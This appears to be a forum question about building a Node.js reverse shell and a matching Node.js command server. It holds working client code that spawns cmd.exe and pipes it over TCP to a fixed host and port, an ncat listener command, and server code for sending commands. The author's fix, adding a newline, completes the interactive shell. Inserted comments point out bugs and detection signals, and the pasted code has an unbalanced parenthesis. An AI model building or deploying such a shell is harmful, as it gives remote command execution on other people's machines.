
Nodejs reverse shell with net.socket

Good morning everyone, I am having an issue with a reverse shell in NodeJS. When I create the socket and listen with netcat it works perfectly, but when I create a new server with net.Server I receive the shell's header but it is not interactive. The shell code is like this:

  // IIFE: spawns cmd.exe and wires its stdio to a TCP connection to a fixed host:port.
  // Defender note: the observable shape is a node process with a cmd.exe child AND an
  // outbound socket — the process tree plus the network flow is the detection signal.
  (function(){
      var net = require("net"),
      child = require("child_process"),
      shell = child.spawn("cmd.exe", []);   // no arguments; its stdin/stdout/stderr streams are used below
      var client = new net.Socket();
      client.connect(4545, "192.168.1.2", function(){      
        client.pipe(shell.stdin);           // bytes received from the peer -> shell input
        shell.stdout.pipe(client);          // shell output -> peer
        shell.stderr.pipe(client);          // shell errors -> the same connection
      });
      return /a/;                           // return value of the IIFE is never used
  })();

and when I listen with netcat I get the reverse shell:

# Plain listener on TCP 4545: -n no DNS lookups, -v verbose, -l listen, -p port.
ncat -nvlp 4545 

The problem arises when I create the TCP server in NodeJS instead: I receive the cmd.exe banner, but without interactivity.

This is the code of the server part:

    const net = require("net");
// TCP listener for the connection above. NOTE(review): as written, nothing in this
// file reads what the remote side sends back — see the comments on the
// "connection" handler for why only the Socket object is printed.
let server = new net.Server();

server.listen({ host: '192.168.1.2', port: 4545 }, () => {
  console.log(`Server listen in 4545`);
});

// "close" on a net.Server fires when the server itself stops listening,
// not when an individual client socket closes.
server.on("close", () => {
  console.log('connection closed')
});

server.on("error", (e) => {
  if (e.code === "EADDRINUSE") {
    console.log("Address in use, retrying...");
    setTimeout(() => {
      // NOTE(review): arrow functions keep the enclosing `this`, and at module
      // top level `this` is not the server, so `this.server` is undefined here
      // and the retry throws. `server.close()` / `server.listen(...)` were meant.
      this.server.close();
      this.server.listen(4545, '192.168.1.2');
    }, 2000);
  }
});

server.on("connection", (socket) => {
  console.log("new connection");

  // HERE I SEND COMMAND WITH ELECTRON JS
  // Without a trailing newline cmd.exe never receives a complete line, which is
  // why the author's later fix appends '\n'.
  socket.write('command');
  // NOTE(review): stream.pipe() returns its destination, so this logs the Socket
  // object itself (the dump shown below), not any command output. Also,
  // socket.pipe(socket) echoes every byte the client sends straight back to the
  // client. (As pasted, this line has one more "(" than ")".)
  console.log((socket.pipe(socket));

  // Socket is quitted
  socket.on("close", () => {
      console.log('socket closed')
  });

  socket.on("end", () => {
    // `${socket}` stringifies to "[object Object]"; socket.remoteAddress and
    // socket.remotePort identify the peer if that is what is wanted.
    console.log(`Client ${socket} disconnected`);
    socket.destroy();
  });      

});

When I send a command, for example `dir`, I receive an object from the pipe call shown above in the server. So the question is: how can I receive the result of the command when I send it, for example the file and directory listing, from the socket?

 Socket {
    connecting: false,
    _hadError: false,
    _parent: null,
    _host: null,
    _readableState: ReadableState {
      objectMode: false,
      highWaterMark: 16384,
      buffer: BufferList { head: null, tail: null, length: 0 },
      length: 0,
      pipes: [Circular],
      pipesCount: 1,
      flowing: true,
      ended: false,
      endEmitted: false,
      reading: true,
      sync: false,
      needReadable: true,
      emittedReadable: false,
      readableListening: false,
      resumeScheduled: false,
      paused: false,
      emitClose: false,
      autoDestroy: false,
      destroyed: false,
      defaultEncoding: 'utf8',
      awaitDrain: 0,
      readingMore: false,
      decoder: null,
      encoding: null
    },
    readable: true,
    _events: [Object: null prototype] {
      end: [ [Function: onReadableStreamEnd], [Function], [Function] ],
      close: [ [Function], [Function] ],
      data: [ [Function], [Function: ondata] ],
      unpipe: [Function: onunpipe],
      error: [Function: onerror],
      finish: [Function: bound onceWrapper] { listener: [Function: onfinish] }
    },
    _eventsCount: 6,
    _maxListeners: undefined,
    _writableState: WritableState {
      objectMode: false,
      highWaterMark: 16384,
      finalCalled: false,
      needDrain: false,
      ending: false,
      ended: false,
      finished: false,
      destroyed: false,
      decodeStrings: false,
      defaultEncoding: 'utf8',
      length: 0,
      writing: false,
      corked: 0,
      sync: false,
      bufferProcessing: false,
      onwrite: [Function: bound onwrite],
      writecb: null,
      writelen: 0,
      afterWriteTickInfo: {
        count: 1,
        cb: [Function: nop],
        stream: [Circular],
        state: [Circular]
      },
      bufferedRequest: null,
      lastBufferedRequest: null,
      pendingcb: 1,
      prefinished: false,
      errorEmitted: false,
      emitClose: false,
      autoDestroy: false,
      bufferedRequestCount: 0,
      corkedRequestsFree: {
        next: null,
        entry: null,
        finish: [Function: bound onCorkedFinish]
      }
    },
    writable: true,
    allowHalfOpen: false,
    _sockname: { address: '192.168.1.2', family: 'IPv4', port: 4545},
    _pendingData: null,
    _pendingEncoding: '',
    server: Server {
      _events: [Object: null prototype] {
        listening: [Function],
        close: [Function],
        error: [Function],
        connection: [Function]
      },
      _eventsCount: 4,
      _maxListeners: undefined,
      _connections: 1,
      _handle: TCP {
        reading: false,
        onconnection: [Function: onconnection],
        [Symbol(owner)]: [Circular]
      },
      _usingWorkers: false,
      _workers: [],
      _unref: false,
      allowHalfOpen: false,
      pauseOnConnect: false,
      _connectionKey: '4:192.168.1.2:4443',
      [Symbol(asyncId)]: 16
    },
    _server: Server {
      _events: [Object: null prototype] {
        listening: [Function],
        close: [Function],
        error: [Function],
        connection: [Function]
      },
      _eventsCount: 4,
      _maxListeners: undefined,
      _connections: 1,
      _handle: TCP {
        reading: false,
        onconnection: [Function: onconnection],
        [Symbol(owner)]: [Circular]
      },
      _usingWorkers: false,
      _workers: [],
      _unref: false,
      allowHalfOpen: false,
      pauseOnConnect: false,
      _connectionKey: '4:192.168.1.2:4545',
      [Symbol(asyncId)]: 16
    },
    id: 790,
    _peername: { address: '192.168.1.2', family: 'IPv4', port: 59793 },
    [Symbol(asyncId)]: 18,
    [Symbol(kHandle)]: TCP {
      reading: true,
      onconnection: null,
      [Symbol(owner)]: [Circular]
    },
    [Symbol(lastWriteQueueSize)]: 0,
    [Symbol(timeout)]: null,
    [Symbol(kBuffer)]: null,
    [Symbol(kBufferCb)]: null,
    [Symbol(kBufferGen)]: null,
    [Symbol(kBytesRead)]: 0,
    [Symbol(kBytesWritten)]: 0
  }

After several attempts I found that appending `\n` to the write acts as pressing Enter, so the code becomes:

socket.write('command'+ '\n');
